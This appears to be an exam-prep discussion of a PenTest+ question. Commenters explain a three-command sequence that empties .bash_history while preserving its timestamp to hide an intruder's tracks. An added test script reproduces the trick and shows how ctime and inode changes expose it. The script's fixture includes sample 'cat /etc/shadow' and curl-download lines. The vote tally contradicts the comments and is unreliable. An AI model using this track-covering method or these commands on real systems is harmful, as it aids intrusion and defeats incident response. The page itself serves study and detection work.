Exam PT0-002 topic 1 question 2 discussion

Actual exam question from CompTIA's PT0-002
Question #: 2
Topic #: 1

A penetration tester gains access to a system and establishes persistence, and then runs the following commands:

Which of the following actions is the tester MOST likely performing?

  • A. Redirecting Bash history to /dev/null
  • B. Making a copy of the user's Bash history for further enumeration
  • C. Covering tracks by clearing the Bash history
  • D. Making decoy files on the system to confuse incident responders
Suggested Answer: C

Comments

RRabbit_111
Highly Voted 7 months, 2 weeks ago
The Linux command "cat /dev/null > temp; touch -r .bash_history temp; mv temp .bash_history" is a combination of three commands that are executed sequentially:
"cat /dev/null > temp" - This command is used to clear the contents of a file called "temp". The contents of the special file "/dev/null" are redirected to "temp", which overwrites any existing data in the file, making the file empty.
"touch -r .bash_history temp" - This command updates the timestamp of the file "temp" to match the timestamp of another file called ".bash_history". The "-r" option specifies that the timestamp of the file ".bash_history" is used to update the timestamp of the file "temp".
"mv temp .bash_history" - This command renames or moves the file "temp" to ".bash_history". The file "temp" no longer exists and a new file called ".bash_history" is created. If a file with the same name already exists, it will be overwritten by the file "temp".
Overall, this command sequence creates an empty file called ".bash_history" with the same timestamp as an existing file with the same name and removes the original file "temp".
upvoted 16 times
RRabbit_111
Highly Voted 7 months, 2 weeks ago
Selected Answer: C
C. Covering tracks by clearing the Bash history
The tester is most likely performing an action of covering tracks by clearing the Bash history. The tester is redirecting the Bash history to /dev/null by using the command "cat /dev/null > temp" which will clear the content of the Bash history file. The tester is then using the command "touch -r .bash_history temp" to reset the timestamp of the temp file to match the timestamp of the Bash history file. Finally, the tester is moving the temp file to replace the Bash history file using "mv temp .bash_history" command. This will clear the Bash history file and make it difficult for incident responders to track the tester's actions on the system.
upvoted 6 times
Sweety_Certified7
Most Recent 7 months ago
Selected Answer: C
Answer: C. Covering tracks by clearing the Bash history
Reason: The penetration tester is clearing the Bash history and preserving its timestamp, a common technique to cover tracks and avoid detection after executing commands.
cat /dev/null > temp: This empties the temp file, essentially creating an empty file.
touch -r .bash_history temp: This sets the timestamp of temp to match the .bash_history file.
mv temp .bash_history: This replaces the .bash_history file with the empty temp file, effectively clearing its contents while preserving the original timestamp.
The commands effectively clear the Bash history, while preserving the original timestamp, making it less obvious that the history has been tampered with.
upvoted 1 times
cy_analyst
7 months, 2 weeks ago
Selected Answer: C
The cat /dev/null command outputs nothing (since /dev/null is a special file that discards all data written to it) and the > operator redirects the output of cat /dev/null to a new file called temp. This creates a new, empty file called temp in the current working directory, and any existing contents in temp (if there were any) are overwritten with the empty output of cat /dev/null. The purpose of creating an empty file like this is to replace the contents of the .bash_history file with an empty file, effectively erasing the command history. After creating the new temp file, the touch -r .bash_history temp command sets the modification time of the temp file to match that of the original .bash_history file, so that it appears as if the .bash_history file was never modified. Finally, the mv temp .bash_history command renames the temp file to .bash_history, effectively replacing the original .bash_history file with an empty file that has the same name and modification time.
upvoted 3 times
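The explanations above describe what the three commands achieve but not what they leave behind. The script below is an added example (not from the exam item or from anyone in this thread) that reproduces the sequence in a throwaway directory and then checks both sides: the attacker's goal (empty file, original mtime kept) and the artifacts a responder can still see (the ctime, which touch cannot set and which the kernel updates on rename, and the new inode number). It assumes GNU coreutils (stat -c, touch -t); the directory, the sample history lines and the 203.0.113.5 address are constructed test data.

```shell
#!/usr/bin/env bash
# Added example: reproduce "cat /dev/null > temp; touch -r .bash_history temp;
# mv temp .bash_history" in a scratch directory and inspect the result.
# Assumes GNU coreutils. All paths and history contents below are constructed.

# Create a fake home directory holding a .bash_history last modified 1 Jan 2024.
make_fixture() {
  local home="$1"
  mkdir -p "$home"
  printf 'whoami\ncat /etc/shadow\ncurl -o /tmp/x http://203.0.113.5/x\n' > "$home/.bash_history"
  touch -t 202401011200.00 "$home/.bash_history"
}

# The sequence from the question, run inside the target home directory.
wipe_history() {
  local home="$1"
  ( cd "$home" &&
    cat /dev/null > temp &&          # create an empty scratch file
    touch -r .bash_history temp &&   # copy atime/mtime from the real history file
    mv temp .bash_history )          # rename the empty file over the history file
}

# Run the sequence and verify the attacker's view and the defender's view.
# Returns 0 only if every check holds.
run_demo() {
  local home="$1" mtime_before ino_before mtime_after ctime_after ino_after
  make_fixture "$home"
  mtime_before=$(stat -c %Y "$home/.bash_history")   # mtime, seconds since epoch
  ino_before=$(stat -c %i "$home/.bash_history")     # inode number

  wipe_history "$home"

  mtime_after=$(stat -c %Y "$home/.bash_history")
  ctime_after=$(stat -c %Z "$home/.bash_history")    # ctime: inode change time
  ino_after=$(stat -c %i "$home/.bash_history")

  # What the technique achieves: the file is empty and its mtime is unchanged.
  [ ! -s "$home/.bash_history" ]        || return 1
  [ "$mtime_after" = "$mtime_before" ]  || return 1
  # What it cannot fake: ctime is set by the kernel when touch and mv run, so it
  # is now far later than the claimed mtime, and the file is a different inode.
  [ "$ctime_after" -gt "$mtime_after" ] || return 1
  [ "$ino_after" != "$ino_before" ]     || return 1
  echo "history emptied, mtime kept at $mtime_after; ctime $ctime_after and inode $ino_after betray the swap"
}

run_demo "$(mktemp -d)"
```

A ctime that is much newer than the mtime is only a hint, since chmod or chown also bump ctime without touching content, but on a history file it is worth a look; the inode change is what file-integrity tooling keyed on inode numbers will flag. Also note that an interactive bash writes its in-memory history back to $HISTFILE when the session ends, so the emptied file is repopulated with that session's commands unless the tester also runs history -c or unsets HISTFILE before logging out.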
MeisAdriano
9 months, 1 week ago
Selected Answer: C
Covering tracks is the right answer
upvoted 1 times
surfuganda
1 year, 1 month ago
Selected Answer: C
C. Covering tracks by clearing the Bash history
Clear explanations already provided by others
upvoted 1 times
P0wned
1 year, 11 months ago
cat /dev/null > temp: This command creates an empty file named "temp" by redirecting the null device ("/dev/null") to the file. Essentially, it empties the contents of "temp" or creates an empty file if it doesn't exist.
touch -r .bash_history temp: The "touch" command is used to update the timestamps of files. In this case, it updates the timestamp of "temp" to match the timestamp of ".bash_history". By using the "-r" option, the timestamp of ".bash_history" is copied to "temp". This command essentially sets the same modification time for "temp" as that of ".bash_history".
mv temp .bash_history: The "mv" command is used to rename or move files. In this case, it renames "temp" to ".bash_history". As a result, the empty file created in the first command is now moved or renamed to replace the original ".bash_history" file.
The end result is that ".bash_history" is emptied and replaced with an empty file.
upvoted 1 times
mypixmania
2 years, 5 months ago
The answer is C. Try recreating it on your system.
upvoted 5 times
Manzer
2 years, 6 months ago
Selected Answer: B
The touch -r command is used to use the timestamp of another file. There is no deleting taking place. mv temp is to move to temp. The tester is making a copy of the file. https://www.geeksforgeeks.org/touch-command-in-linux-with-examples/
upvoted 2 times
Community vote distribution: A (35%), C (25%), B (20%), Other